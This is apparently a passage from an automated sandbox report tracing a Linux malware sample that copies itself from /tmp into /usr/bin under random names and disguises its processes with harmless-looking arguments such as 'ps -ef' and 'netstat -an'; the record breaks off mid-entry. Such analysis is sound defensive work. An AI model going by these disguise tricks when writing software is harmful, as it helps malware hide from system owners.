Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10777, Parent PID: 10775

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	/usr/bin/wgerzwaeqg "sleep 1" 9446
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: wgerzwaeqg PID: 10785, Parent PID: 10777

General

Start time:	09:50:20
Start date:	27/07/2022
Path:	/usr/bin/wgerzwaeqg
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	26f4791e4abad1456b3c4b154d2d2918

Chronological Activities

Analysis Process: dkuidbsedp PID: 10815, Parent PID: 9446

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10816, Parent PID: 10815

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10816, Parent PID: 3310

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	/usr/bin/chvtxqzhiw "cat resolv.conf" 9446
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10818, Parent PID: 10816

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: dkuidbsedp PID: 10817, Parent PID: 9446

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10819, Parent PID: 10817

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10819, Parent PID: 10817

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	/usr/bin/chvtxqzhiw gnome-terminal 9446
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10820, Parent PID: 10819

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: dkuidbsedp PID: 10821, Parent PID: 9446

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10824, Parent PID: 10821

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10824, Parent PID: 3310

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	/usr/bin/chvtxqzhiw ifconfig 9446
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10832, Parent PID: 10824

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: dkuidbsedp PID: 10826, Parent PID: 9446

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10829, Parent PID: 10826

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10829, Parent PID: 3310

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	/usr/bin/chvtxqzhiw bash 9446
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10841, Parent PID: 10829

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: dkuidbsedp PID: 10831, Parent PID: 9446

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10834, Parent PID: 10831

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10834, Parent PID: 3310

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	/usr/bin/chvtxqzhiw top 9446
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: chvtxqzhiw PID: 10838, Parent PID: 10834

General

Start time:	09:50:25
Start date:	27/07/2022
Path:	/usr/bin/chvtxqzhiw
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	95a3baa8a504f487595262f5f028bf8e

Chronological Activities

Analysis Process: dkuidbsedp PID: 10870, Parent PID: 9446

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10871, Parent PID: 10870

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwevskbjgs PID: 10871, Parent PID: 3310

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	/usr/bin/qwevskbjgs su 9446
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: qwevskbjgs PID: 10873, Parent PID: 10871

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: dkuidbsedp PID: 10872, Parent PID: 9446

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10874, Parent PID: 10872

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwevskbjgs PID: 10874, Parent PID: 3310

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	/usr/bin/qwevskbjgs "route -n" 9446
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: qwevskbjgs PID: 10876, Parent PID: 10874

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: dkuidbsedp PID: 10875, Parent PID: 9446

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10877, Parent PID: 10875

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwevskbjgs PID: 10877, Parent PID: 3310

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	/usr/bin/qwevskbjgs pwd 9446
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: qwevskbjgs PID: 10880, Parent PID: 10877

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: dkuidbsedp PID: 10879, Parent PID: 9446

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10882, Parent PID: 10879

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwevskbjgs PID: 10882, Parent PID: 10879

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	/usr/bin/qwevskbjgs uptime 9446
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: qwevskbjgs PID: 10884, Parent PID: 10882

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: dkuidbsedp PID: 10886, Parent PID: 9446

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10889, Parent PID: 10886

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwevskbjgs PID: 10889, Parent PID: 3310

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	/usr/bin/qwevskbjgs "sleep 1" 9446
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: qwevskbjgs PID: 10891, Parent PID: 10889

General

Start time:	09:50:30
Start date:	27/07/2022
Path:	/usr/bin/qwevskbjgs
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	c3ba5c7cde48244ebce7e6220e2b27fd

Chronological Activities

Analysis Process: dkuidbsedp PID: 10925, Parent PID: 9446

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10926, Parent PID: 10925

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kztofeuxtk PID: 10926, Parent PID: 3310

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	/usr/bin/kztofeuxtk su 9446
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: kztofeuxtk PID: 10929, Parent PID: 10926

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: dkuidbsedp PID: 10927, Parent PID: 9446

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10928, Parent PID: 10927

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kztofeuxtk PID: 10928, Parent PID: 3310

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	/usr/bin/kztofeuxtk "netstat -an" 9446
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: kztofeuxtk PID: 10936, Parent PID: 10928

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: dkuidbsedp PID: 10930, Parent PID: 9446

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10931, Parent PID: 10930

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kztofeuxtk PID: 10931, Parent PID: 3310

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	/usr/bin/kztofeuxtk who 9446
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: kztofeuxtk PID: 10939, Parent PID: 10931

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: dkuidbsedp PID: 10932, Parent PID: 9446

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10933, Parent PID: 10932

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kztofeuxtk PID: 10933, Parent PID: 3310

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	/usr/bin/kztofeuxtk "netstat -an" 9446
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: kztofeuxtk PID: 10935, Parent PID: 10933

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: dkuidbsedp PID: 10934, Parent PID: 9446

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10938, Parent PID: 10934

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kztofeuxtk PID: 10938, Parent PID: 10934

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	/usr/bin/kztofeuxtk uptime 9446
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: kztofeuxtk PID: 10941, Parent PID: 10938

General

Start time:	09:50:35
Start date:	27/07/2022
Path:	/usr/bin/kztofeuxtk
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	62ca1425a6696323f767d20d3413c202

Chronological Activities

Analysis Process: dkuidbsedp PID: 10980, Parent PID: 9446

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10981, Parent PID: 10980

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10981, Parent PID: 3310

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	/usr/bin/tihvbqlbyh ifconfig 9446
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10983, Parent PID: 10981

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: dkuidbsedp PID: 10982, Parent PID: 9446

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10984, Parent PID: 10982

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10984, Parent PID: 3310

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	/usr/bin/tihvbqlbyh sh 9446
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10987, Parent PID: 10984

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: dkuidbsedp PID: 10985, Parent PID: 9446

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10988, Parent PID: 10985

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10988, Parent PID: 10985

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	/usr/bin/tihvbqlbyh su 9446
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10990, Parent PID: 10988

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: dkuidbsedp PID: 10991, Parent PID: 9446

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10995, Parent PID: 10991

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tihvbqlbyh PID: 10995, Parent PID: 3310

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	/usr/bin/tihvbqlbyh "cd /etc" 9446
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: tihvbqlbyh PID: 11002, Parent PID: 10995

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11000, Parent PID: 9446

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11004, Parent PID: 11000

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tihvbqlbyh PID: 11004, Parent PID: 11000

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	/usr/bin/tihvbqlbyh "echo \"find\"" 9446
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: tihvbqlbyh PID: 11006, Parent PID: 11004

General

Start time:	09:50:40
Start date:	27/07/2022
Path:	/usr/bin/tihvbqlbyh
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	5a151b9cf6355b8e27d8585ffa77f259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11035, Parent PID: 9446

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11036, Parent PID: 11035

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: evsgasjgju PID: 11036, Parent PID: 3310

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	/usr/bin/evsgasjgju "ps -ef" 9446
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: evsgasjgju PID: 11038, Parent PID: 11036

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11037, Parent PID: 9446

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11039, Parent PID: 11037

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: evsgasjgju PID: 11039, Parent PID: 3310

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	/usr/bin/evsgasjgju id 9446
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: evsgasjgju PID: 11046, Parent PID: 11039

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11041, Parent PID: 9446

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11043, Parent PID: 11041

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: evsgasjgju PID: 11043, Parent PID: 3310

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	/usr/bin/evsgasjgju who 9446
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: evsgasjgju PID: 11059, Parent PID: 11043

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11045, Parent PID: 9446

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11050, Parent PID: 11045

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: evsgasjgju PID: 11050, Parent PID: 3310

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	/usr/bin/evsgasjgju "route -n" 9446
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: evsgasjgju PID: 11054, Parent PID: 11050

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11051, Parent PID: 9446

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11055, Parent PID: 11051

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: evsgasjgju PID: 11055, Parent PID: 11051

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	/usr/bin/evsgasjgju whoami 9446
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: evsgasjgju PID: 11060, Parent PID: 11055

General

Start time:	09:50:45
Start date:	27/07/2022
Path:	/usr/bin/evsgasjgju
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	a99a5cd9581ce3735104776f185cd259

Chronological Activities

Analysis Process: dkuidbsedp PID: 11100, Parent PID: 9446

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11101, Parent PID: 11100

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11101, Parent PID: 3310

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	/usr/bin/jyfcwmvcim pwd 9446
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11107, Parent PID: 11101

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: dkuidbsedp PID: 11102, Parent PID: 9446

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11103, Parent PID: 11102

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11103, Parent PID: 3310

General

Start time:	09:50:50
